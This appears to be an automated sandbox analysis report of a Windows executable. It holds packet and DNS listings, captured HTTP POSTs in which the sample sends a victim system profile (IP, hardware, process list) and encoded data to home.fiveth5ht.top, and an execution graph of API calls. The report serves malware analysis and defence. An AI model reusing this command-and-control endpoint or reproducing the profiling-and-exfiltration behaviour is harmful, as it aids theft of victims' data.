                                                        Dec 28, 2024 09:47:11.158418894 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.158499002 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.158509970 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.158575058 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.158627033 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.158668041 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.158687115 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.158763885 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.158798933 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.158869982 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.158879995 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.158962011 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.158998966 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.159050941 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.159060955 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.159121037 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.159132957 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.159223080 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.159234047 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.159288883 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.159300089 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.219116926 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.219234943 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.219319105 CET4970580192.168.2.581.29.149.125
                                                        Dec 28, 2024 09:47:11.219928026 CET4970580192.168.2.581.29.149.125
                                                        Dec 28, 2024 09:47:11.234169960 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.234230042 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.275804043 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.275814056 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.275860071 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.275868893 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.275969028 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.275978088 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.275985956 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.277532101 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.277540922 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.277627945 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.277637959 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.277684927 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.277693987 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.277786016 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.277834892 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.277884007 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.277913094 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.277955055 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.278058052 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.278068066 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.278073072 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.278188944 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.278198004 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.278208017 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.278276920 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.278304100 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.278359890 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.278372049 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.278410912 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.278465033 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.278511047 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.278606892 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.278614998 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.278700113 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.278760910 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.278770924 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.278799057 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.278907061 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.278917074 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.278953075 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.278961897 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.279046059 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.279055119 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.279103994 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.279112101 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.279181957 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.279190063 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.279246092 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.279254913 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.279306889 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.279357910 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.279452085 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.279462099 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.279556036 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.279566050 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.279575109 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.279591084 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.279659033 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.279700041 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.279736996 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.279746056 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.338821888 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.339360952 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:12.040869951 CET4970680192.168.2.581.29.149.125
                                                        Dec 28, 2024 09:47:12.160489082 CET804970681.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:12.160568953 CET4970680192.168.2.581.29.149.125
                                                        Dec 28, 2024 09:47:12.161123991 CET4970680192.168.2.581.29.149.125
                                                        Dec 28, 2024 09:47:12.280599117 CET804970681.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:13.520793915 CET804970681.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:13.520890951 CET804970681.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:13.520958900 CET4970680192.168.2.581.29.149.125
                                                        Dec 28, 2024 09:47:13.521445990 CET4970680192.168.2.581.29.149.125
                                                        Dec 28, 2024 09:47:13.640930891 CET804970681.29.149.125192.168.2.5
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Dec 28, 2024 09:47:04.014230967 CET  62851        53         192.168.2.5  1.1.1.1
Dec 28, 2024 09:47:04.014413118 CET  62851        53         192.168.2.5  1.1.1.1
Dec 28, 2024 09:47:04.158147097 CET  53           62851      1.1.1.1      192.168.2.5
Dec 28, 2024 09:47:04.314042091 CET  53           62851      1.1.1.1      192.168.2.5
Dec 28, 2024 09:47:09.329799891 CET  62854        53         192.168.2.5  1.1.1.1
Dec 28, 2024 09:47:09.329906940 CET  62854        53         192.168.2.5  1.1.1.1
Dec 28, 2024 09:47:09.472767115 CET  53           62854      1.1.1.1      192.168.2.5
Dec 28, 2024 09:47:09.740191936 CET  53           62854      1.1.1.1      192.168.2.5
Dec 28, 2024 09:47:11.898385048 CET  62856        53         192.168.2.5  1.1.1.1
Dec 28, 2024 09:47:11.898484945 CET  62856        53         192.168.2.5  1.1.1.1
Dec 28, 2024 09:47:12.038243055 CET  53           62856      1.1.1.1      192.168.2.5
Dec 28, 2024 09:47:12.038897991 CET  53           62856      1.1.1.1      192.168.2.5
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                Type            Class        DNS over HTTPS
Dec 28, 2024 09:47:04.014230967 CET  192.168.2.5  1.1.1.1  0x72fe    Standard query (0)  httpbin.org         A (IP address)  IN (0x0001)  false
Dec 28, 2024 09:47:04.014413118 CET  192.168.2.5  1.1.1.1  0x9fc6    Standard query (0)  httpbin.org         28              IN (0x0001)  false
Dec 28, 2024 09:47:09.329799891 CET  192.168.2.5  1.1.1.1  0x80c1    Standard query (0)  home.fiveth5ht.top  A (IP address)  IN (0x0001)  false
Dec 28, 2024 09:47:09.329906940 CET  192.168.2.5  1.1.1.1  0x1d42    Standard query (0)  home.fiveth5ht.top  28              IN (0x0001)  false
Dec 28, 2024 09:47:11.898385048 CET  192.168.2.5  1.1.1.1  0x4461    Standard query (0)  home.fiveth5ht.top  A (IP address)  IN (0x0001)  false
Dec 28, 2024 09:47:11.898484945 CET  192.168.2.5  1.1.1.1  0x44fb    Standard query (0)  home.fiveth5ht.top  28              IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                CName  Address         Type            Class        DNS over HTTPS
Dec 28, 2024 09:47:04.314042091 CET  1.1.1.1    192.168.2.5  0x72fe    No error (0)  httpbin.org                3.218.7.103     A (IP address)  IN (0x0001)  false
Dec 28, 2024 09:47:04.314042091 CET  1.1.1.1    192.168.2.5  0x72fe    No error (0)  httpbin.org                34.226.108.155  A (IP address)  IN (0x0001)  false
Dec 28, 2024 09:47:09.472767115 CET  1.1.1.1    192.168.2.5  0x80c1    No error (0)  home.fiveth5ht.top         81.29.149.125   A (IP address)  IN (0x0001)  false
Dec 28, 2024 09:47:12.038243055 CET  1.1.1.1    192.168.2.5  0x4461    No error (0)  home.fiveth5ht.top         81.29.149.125   A (IP address)  IN (0x0001)  false
                                                        • httpbin.org
                                                        • home.fiveth5ht.top
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.5  49705        81.29.149.125   80                5620  C:\Users\user\Desktop\A3nofpjN9A.exe
Timestamp                            Bytes transferred  Direction  Data
Dec 28, 2024 09:47:09.863173008 CET  12360              OUT        POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                                   Host: home.fiveth5ht.top
                                                                   Accept: */*
                                                                   Content-Type: application/json
                                                                   Content-Length: 444274
                                                        Data Ascii: { "ip": "8.46.123.189", "current_time": "8428488241957550858", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 564 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 444 }, { "name": "svchost.exe", "pid": 732 }, { "name": "svchost.exe", "pid": 280 }, { "name": "svchost.exe" [TRUNCATED]
                                                        Dec 28, 2024 09:47:09.983083963 CET7416OUTData Raw: 68 56 4b 63 4d 54 51 70 59 6d 69 6e 78 74 34 63 77 71 54 6f 31 34 52 6e 53 6e 37 47 66 46 38 61 30 65 65 4d 6b 2b 57 63 49 79 56 37 53 69 6d 6d 6a 38 68 4b 4b 5c 2f 58 36 33 5c 2f 34 4a 4f 65 49 4c 67 6b 66 38 4c 73 30 56 43 44 67 67 2b 43 4c 34
                                                        Data Ascii: hVKcMTQpYminxt4cwqTo14RnSn7GfF8a0eeMk+WcIyV7Simmj8hKK\/X63\/4JOeILgkf8Ls0VCDgg+CL4kMP4T\/xUowcYPODyK\/MH4l+Cbn4a\/EPxt8Pru\/g1S58F+KNb8MzalbRSQQX76PqE9ibyKCVnkgS48kSiF3kMW7y\/Mk272\/RfB76U3gL4+5tnGR+EfiBh+L81yDAUs0zfB0sh4qyepg8BWxMcJTxEpcQ5HlN
                                                        Dec 28, 2024 09:47:09.983198881 CET17304OUTData Raw: 71 32 58 35 6c 68 76 72 63 73 78 65 42 65 61 53 64 57 6a 6a 73 52 51 56 43 65 4e 6c 67 34 2b 31 6a 50 36 75 70 77 6a 55 6a 5c 2f 65 58 30 52 61 47 59 5a 56 69 71 47 64 63 4a 5a 6e 51 34 65 34 77 34 69 70 5a 74 77 74 44 4e 73 54 52 70 34 36 68 69
                                                        Data Ascii: q2X5lhvrcsxeBeaSdWjjsRQVCeNlg4+1jP6upwjUj\/eX0RaGYZViqGdcJZnQ4e4w4ipZtwtDNsTRp46hi8PWxWBx2EyWWFx1PF4HDPMczyzLqFLGwwft6dd04zrRw1Sun+hP\/ABErf9WW\/wDmxn\/4iK\/aT\/gnj+29a\/t8\/A\/XvjHb\/Da4+Fkvh34l678Nr7wzN4sj8aRyXWjeHPCPiZNUtNcTw74VaS3urLxfZwtb
                                                        Dec 28, 2024 09:47:10.103184938 CET14832OUTData Raw: 61 76 53 6f 34 57 6c 6c 30 38 52 69 31 51 72 35 46 6e 64 4b 74 57 77 6c 4f 76 52 70 53 79 66 4d 31 55 71 52 2b 6f 59 72 32 58 39 49 30 5c 2f 70 41 5c 2f 54 6c 71 30 4d 75 78 55 65 46 73 71 6a 68 4d 30 77 55 63 77 77 65 4e 72 63 4f 5a 4e 68 38 45
                                                        Data Ascii: avSo4Wll08Ri1Qr5FndKtWwlOvRpSyfM1UqR+oYr2X9I0\/pA\/Tlq0MuxUeFsqjhM0wUcwweNrcOZNh8E8JUhldSlUxOMr5pTw2AlWhneTOhRx9XDV67zbLY0ac5Y7DKr\/Ql\/w\/XP8A0ayP\/D4f\/igr8uf22f2sD+2L8VdA+Jx8Cj4cNofw\/wBK8CDQh4n\/AOEuFyml+IvFPiAaqdV\/4R7wyY2uH8USWhsf7NcQrYp
                                                        Dec 28, 2024 09:47:10.147089005 CET27192OUTData Raw: 4c 50 38 41 6f 4e 51 5c 2f 37 69 52 37 34 35 66 76 5c 2f 77 43 6f 38 36 44 36 2b 5c 2f 66 6b 55 47 6c 50 72 38 76 31 42 6a 35 6b 62 77 78 74 49 36 65 64 2b 36 74 5c 2f 4e 5c 2f 78 2b 76 2b 4e 4d 77 2b 33 5a 76 32 59 5c 2f 35 5a 79 44 5c 2f 58 64
                                                        Data Ascii: LP8AoNQ\/7iR745fv\/wCo86D6+\/fkUGlPr8v1Bj5kbwxtI6ed+6t\/N\/x+v+NMw+3Zv2Y\/5ZyD\/Xdv+PT8Prx+U29JW2Tff8o\/6RHL79x\/nNVvNRY3+STZnjzP1I\/yKn3\/AO7+JoHyL9Osv+fb\/PWm\/wCsX7\/76T\/Wx+b+Z\/D1461LGqfOf3iJz+8\/57f59D1qE\/u97796f88\/+nc9P8\/n70AbH2\/fH\
                                                        Dec 28, 2024 09:47:10.266980886 CET | 7416 | OUT | Data Raw: 7a 6a 69 70 53 6f 30 36 6c 5a 4b 67 36 6a 64 4b 45 71 69 76 43 45 6d 65 70 50 38 41 62 67 5c 2f 74 51 36 56 54 4d 4b 4e 54 78 68 70 55 36 75 55 78 63 73 31 70 54 38 46 5c 2f 43 47 46 54 4c 59 78 72 55 38 50 4b 57 59 51 6c 34 63 71 57 43 69 71 39
                                                        Data Ascii: zjipSo06lZKg6jdKEqivCEmepP8Abg\/tQ6VTMKNTxhpU6uUxcs1pT8F\/CGFTLYxrU8PKWYQl4cqWCiq9SFBvEKmlWqwpfHKMX+WOm\/sf+NpruFL66WO2Lr5rJAsbbMjOHaeYKccf6tv6H9Cvhh8PNO+HHhy20WxRQyIPOdf4nJ3MSeSxLlmZiSWYszEkk16Z5fv+n\/16PL9\/0\/8Ar1+6+D\/0ZfBrwLxeY5h4ccJUcnzL
                                                        Dec 28, 2024 09:47:10.434950113 CET | 1236 | OUT | Data Raw: 66 35 66 68 57 66 73 5c 2f 50 38 50 38 41 67 6e 51 4d 58 61 59 35 6a 73 5c 2f 35 39 34 76 2b 65 5c 2f 38 41 6e 30 5c 2f 53 71 76 6c 76 44 76 44 78 37 50 33 76 37 30 5c 2f 35 2b 6c 57 6a 47 35 33 37 45 6a 52 5c 2f 2b 65 6e 39 50 38 66 58 33 70 6e
                                                        Data Ascii: f5fhWfs\/P8P8AgnQMXaY5js\/594v+e\/8An0\/SqvlvDvDx7P3v70\/5+lWjG537EjR\/+en9P8fX3pnk3Mn\/AC0P2nzfNH73\/Pr0\/GtDSn1+X6lXzHkld0eR3\/56SS+f7f5\/zhfk+fYmz91cf8sv+Xj+nvU0knmSDe+\/91\/1w\/zn\/OKYxRv4\/nk\/55\/z+vf\/APVQaDH\/ANZ9yPZH+6\/1XnnuRwfbj9KZ8
                                                        Dec 28, 2024 09:47:10.634861946 CET | 1236 | OUT | Data Raw: 46 62 46 74 4c 74 35 37 71 78 73 4a 62 2b 4f 5c 2f 76 37 4b 31 6e 38 6e 31 54 39 6b 37 34 48 61 74 65 58 56 5c 2f 4e 34 51 74 34 4c 75 39 42 46 78 4e 61 66 5a 34 69 77 4d 34 75 43 41 72 57 30 69 4b 44 49 71 35 41 58 47 46 47 4f 65 61 5c 2f 6a 6e
                                                        Data Ascii: FbFtLt57qxsJb+O\/v7K1n8n1T9k74HateXV\/N4Qt4Lu9BFxNafZ4iwM4uCArW0iKDIq5AXGFGOea\/jnjLwe434z8QOKuNuD\/FDB4PGTxWD4Zr5fgcVWbyfh3BU8nzLE8PYmrga8cTh8xzDMsIsVXquth3hsqzTH4ajhVicZTzOn\/oX4ZfSH8NvDTwz4D4A8QPBHHZtl2GjW46wWZ5phKVOnn\/ABXiswx2XUuKMFHG0FDG
                                                        Dec 28, 2024 09:47:10.874826908 CET | 1236 | OUT | Data Raw: 66 74 61 64 44 42 34 5a 31 47 31 53 77 74 43 50 4c 41 5c 2f 67 33 78 33 34 32 34 4d 38 51 38 77 34 63 7a 6e 77 37 38 4f 61 58 41 66 44 65 52 38 50 5a 66 77 31 69 33 67 38 46 52 6f 30 63 31 7a 6a 44 77 6e 55 71 5a 68 6a 36 2b 44 77 57 48 77 7a 7a
                                                        Data Ascii: ftadDB4Z1G1SwtCPLA\/g3x3424M8Q8w4cznw78OaXAfDeR8PZfw1i3g8FRo0c1zjDwnUqZhj6+DwWHwzzLF01KpOFSvjMTKMJTliakEowkf7x\/D+QqJfBXif4lajoPw58E6Pfa\/4z8eeIdH8I+FdJsEZnutc168jsLN7qVYLlbPS7Lznv9X1KaE2umaZa3eoXjR2ttM6z43M3t\/+rP6frXP+JfC2k+L9GutC12F7jTbwATw
                                                        Dec 28, 2024 09:47:10.916451931 CET | 63036 | OUT | Data Raw: 2f 77 43 46 64 70 4c 46 50 61 65 47 6f 4c 61 35 69 38 37 46 31 41 77 53 34 66 7a 38 37 5c 2f 4e 6b 43 5a 6b 34 4a 41 7a 30 42 50 55 38 31 46 42 2b 7a 33 38 4c 6f 49 4c 2b 32 6a 30 4c 5c 2f 52 39 54 75 35 62 32 39 69 4d 69 42 4a 37 69 5a 6b 5a 32
                                                        Data Ascii: /wCFdpLFPaeGoLa5i87F1AwS4fz87\/NkCZk4JAz0BPU81FB+z38LoIL+2j0L\/R9Tu5b29iMiBJ7iZkZ2cJCu4bo1IDZ75JzXtYX6KXEeH+p1Z8UZXiMZhs4zzN6k62FxtXB4v+18g\/s\/DZVjcFUxrWJyXKs3VDMMvy+pWcMFl2XZdkeFlDCYSlUXzWO+nFwpi542lR4PzvB5fism4ayiFKljMsWYYStkfEMsdjM6wWYf2fJ
                                                        Dec 28, 2024 09:47:10.916527987 CET | 1236 | OUT | Data Raw: 62 35 63 35 37 65 6c 4d 5a 63 38 6a 72 57 6d 47 36 66 31 5c 2f 4d 61 6a 45 5c 2f 31 6b 6c 44 5c 2f 41 48 6a 2b 48 38 68 54 31 58 48 4a 36 30 4d 75 65 52 31 6f 71 64 50 6e 2b 67 45 56 46 46 46 4b 47 5c 2f 79 5c 2f 56 47 73 4e 76 6e 2b 69 49 5c 2f
                                                        Data Ascii: b5c57elMZc8jrWmG6f1\/MajE\/1klD\/AHj+H8hT1XHJ60MueR1oqdPn+gEVFFFKG\/y\/VGsNvn+iI\/8Aln\/n+9UdWKr1qWQ8ue3A\/wA+tNqdQV\/PNRv1\/D+poOgZT42z+PI+vf8Az7UyiugCSTt+NQP0\/H+hq3Ucnb8aAK2w+3+fwplWKg8vjf8A\/q6dfrjt6e9dACU7Y3p\/L\/Gm0UHQFQNET7\/T\/wCvU9FdA
                                                        Dec 28, 2024 09:47:11.219116926 CET | 212 | IN | HTTP/1.0 503 Service Unavailable
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        1 | 192.168.2.5 | 49706 | 81.29.149.125 | 80 | 5620 | C:\Users\user\Desktop\A3nofpjN9A.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Dec 28, 2024 09:47:12.161123991 CET | 284 | OUT | POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                        Host: home.fiveth5ht.top
                                                        Accept: */*
                                                        Content-Type: application/json
                                                        Content-Length: 143
                                                        Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                        Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
                                                        Dec 28, 2024 09:47:13.520793915 CET | 212 | IN | HTTP/1.0 503 Service Unavailable
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        0 | 192.168.2.5 | 49704 | 3.218.7.103 | 443 | 5620 | C:\Users\user\Desktop\A3nofpjN9A.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-28 08:47:06 UTC | 52 | OUT | GET /ip HTTP/1.1
                                                        Host: httpbin.org
                                                        Accept: */*
                                                        2024-12-28 08:47:07 UTC | 224 | IN | HTTP/1.1 200 OK
                                                        Date: Sat, 28 Dec 2024 08:47:07 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 31
                                                        Connection: close
                                                        Server: gunicorn/19.9.0
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Credentials: true
                                                        2024-12-28 08:47:07 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                        Data Ascii: { "origin": "8.46.123.189"}



                                                        Target ID:0
                                                        Start time:03:47:00
                                                        Start date:28/12/2024
                                                        Path:C:\Users\user\Desktop\A3nofpjN9A.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\A3nofpjN9A.exe"
                                                        Imagebase:0x3d0000
                                                        File size:4'482'048 bytes
                                                        MD5 hash:2115E3FBDA695F11AF734C24EE699E6D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true


                                                          Execution Graph

                                                          Execution Coverage:6%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:23.3%
                                                          Total number of Nodes:202
                                                          Total number of Limit Nodes:28
                                                          execution_graph 19945 40b3c0 19946 40b3cb 19945->19946 19947 40b3ee 19945->19947 19951 409290 19946->19951 19958 3d76a0 19946->19958 19948 40b3ea 19952 3d76a0 send 19951->19952 19953 4092e5 19952->19953 19954 409335 WSAIoctl 19953->19954 19955 409392 19953->19955 19954->19955 19956 409366 19954->19956 19955->19948 19956->19955 19957 409371 setsockopt 19956->19957 19957->19955 19959 3d76e6 send 19958->19959 19960 3d76c0 19958->19960 19961 3d76c9 19959->19961 19960->19959 19960->19961 19961->19948 19962 40b400 19963 40b425 19962->19963 19964 40b40b 19962->19964 19967 3d7770 19964->19967 19965 40b421 19968 3d77b6 recv 19967->19968 19969 3d7790 19967->19969 19970 3d7799 19968->19970 19969->19968 19969->19970 19970->19965 20067 3d255d 20068 759f70 20067->20068 20069 3d256c GetSystemInfo 20068->20069 20070 3d2589 20069->20070 20071 3d25a0 GlobalMemoryStatusEx 20070->20071 20076 3d25ec 20071->20076 20072 3d2762 20075 3d27d6 KiUserCallbackDispatcher 20072->20075 20073 3d263c GetDriveTypeA 20074 3d2655 GetDiskFreeSpaceExA 20073->20074 20073->20076 20074->20076 20077 3d27f8 20075->20077 20076->20072 20076->20073 20078 3d28d9 FindFirstFileW 20077->20078 20079 3d2906 FindNextFileW 20078->20079 20080 3d2928 20078->20080 20079->20079 20079->20080 19971 3d29ff FindFirstFileA 19972 3d2a31 19971->19972 19973 3d2a5c RegOpenKeyExA 19972->19973 19974 3d2a93 19973->19974 19975 3d2ade CharUpperA 19974->19975 19977 3d2b0a 19975->19977 19976 3d2bf9 QueryFullProcessImageNameA 19978 3d2c3b CloseHandle 19976->19978 19977->19976 19980 3d2c64 19978->19980 19979 3d2df1 CloseHandle 19981 3d2e23 19979->19981 19980->19979 20081 3d3d5e 20082 3d3d30 20081->20082 20082->20081 20083 3d3d90 20082->20083 20085 3e0ab0 20082->20085 20088 3e05b0 20085->20088 20087 3e0acd 20087->20082 20089 3e07c7 20088->20089 20090 3e05bd 20088->20090 20089->20087 20090->20089 20091 3e0707 WSAEventSelect 20090->20091 20092 3e07ef 20090->20092 20094 3d76a0 send 
